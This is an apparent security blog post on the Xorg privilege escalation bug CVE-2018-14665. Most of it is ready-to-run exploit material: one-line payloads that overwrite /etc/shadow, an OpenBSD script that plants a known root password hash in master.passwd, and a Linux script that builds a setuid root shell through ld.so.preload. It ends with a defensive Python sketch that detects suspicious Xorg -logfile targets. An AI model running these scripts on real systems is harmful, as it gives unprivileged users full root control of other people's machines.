Neurohazard
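Evening clouds and misty moon, poring over the classics until the hair turns white; all the myriad phenomena of the world, thus have I heard.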

OpenBSD Xorg Server Privilege Escalation Vulnerability (CVE-2018-14665)

wpadmin~October 26, 2018 /InfoSec

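The OpenBSD Xorg server privilege escalation vulnerability can be triggered from a remote SSH session (CVE-2018-14665)

Basic information

Local Privilege Escalation (LPE)

The OpenBSD Xorg server privilege escalation vulnerability can be triggered from a remote SSH session (CVE-2018-14665)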
https://twitter.com/hackerfantastic/status/1055517801224396800

PoC / Exp

Key payload

echo 'cd /etc; Xorg -quiet -fp "root::16431:0:99999:7:::" -keeptty -logfile shadow :1' | sh; su
cd /etc; Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1;su

https://hacker.house/releasez/expl0itz/openbsd-0day-cve-2018-14665.sh

#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root. 
# - https://hacker.house
echo [+] OpenBSD 6.4 stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old 
echo [+] type 'Password1' and hit enter for root
su -

x0rg.sh
https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850

#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector. 
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Hack the planet!"
cd /etc; Xorg -fp "/tmp/libhax.so" -logfile ld.so.preload :1;
mount # arbitrary setuid we run to pop root
echo "[+] Tidy up a bit..."
rm -f /tmp/libhax.so
echo "[<3] :PPpPpPpOpr000000t!"
/tmp/rootshell
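
Every payload above has the same shape: a non-root user runs Xorg with -logfile naming a file that resolves into /etc. The following detection sketch is an added example, not part of the original post or of either exploit script; the record format, the allowed log directories and the sample events are assumptions constructed for illustration.

```python
import os
import re
import shlex

# Assumed locations where an Xorg log legitimately lives; adjust per site.
EXPECTED_LOG = re.compile(r"^(/var/log/|/home/[^/]+/\.local/share/xorg/)")

def logfile_target(cwd, cmdline):
    """Return the absolute path an Xorg command line would log to, or None."""
    argv = shlex.split(cmdline)
    if not argv or os.path.basename(argv[0]) not in ("Xorg", "X"):
        return None
    for i, arg in enumerate(argv[:-1]):
        if arg == "-logfile":
            # A relative name is resolved against the working directory,
            # which is why the payloads start with `cd /etc`.
            return os.path.normpath(os.path.join(cwd, argv[i + 1]))
    return None

def is_suspicious(uid, cwd, cmdline):
    """Flag a non-root Xorg start whose log path is outside the expected dirs."""
    target = logfile_target(cwd, cmdline)
    if target is None or uid == 0:
        return False
    return EXPECTED_LOG.match(target) is None

# Constructed process-execution records: (uid, cwd, command line).
SAMPLE_EVENTS = [
    (1000, "/etc", 'Xorg -fp "PLACEHOLDER_TEXT" -logfile shadow :1'),
    (1000, "/etc", "Xorg -fp /tmp/PLACEHOLDER.so -logfile ld.so.preload :1"),
    (1000, "/var/log", "Xorg -logfile ../../etc/master.passwd :1"),
    (1000, "/home/alice", "Xorg :1 -logfile /home/alice/.local/share/xorg/Xorg.1.log"),
    (0, "/", "/usr/X11R6/bin/Xorg :0 -logfile /var/log/Xorg.0.log"),
    (1000, "/home/alice", "xterm -e top"),
]

def scan(events):
    """Return (uid, resolved log path) for every suspicious record."""
    return [(uid, logfile_target(cwd, cmd))
            for uid, cwd, cmd in events if is_suspicious(uid, cwd, cmd)]

if __name__ == "__main__":
    for uid, path in scan(SAMPLE_EVENTS):
        print(f"ALERT uid={uid} Xorg -logfile -> {path}")
```

The same rule can be applied to any process-execution telemetry that records the user, working directory and full argument list.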
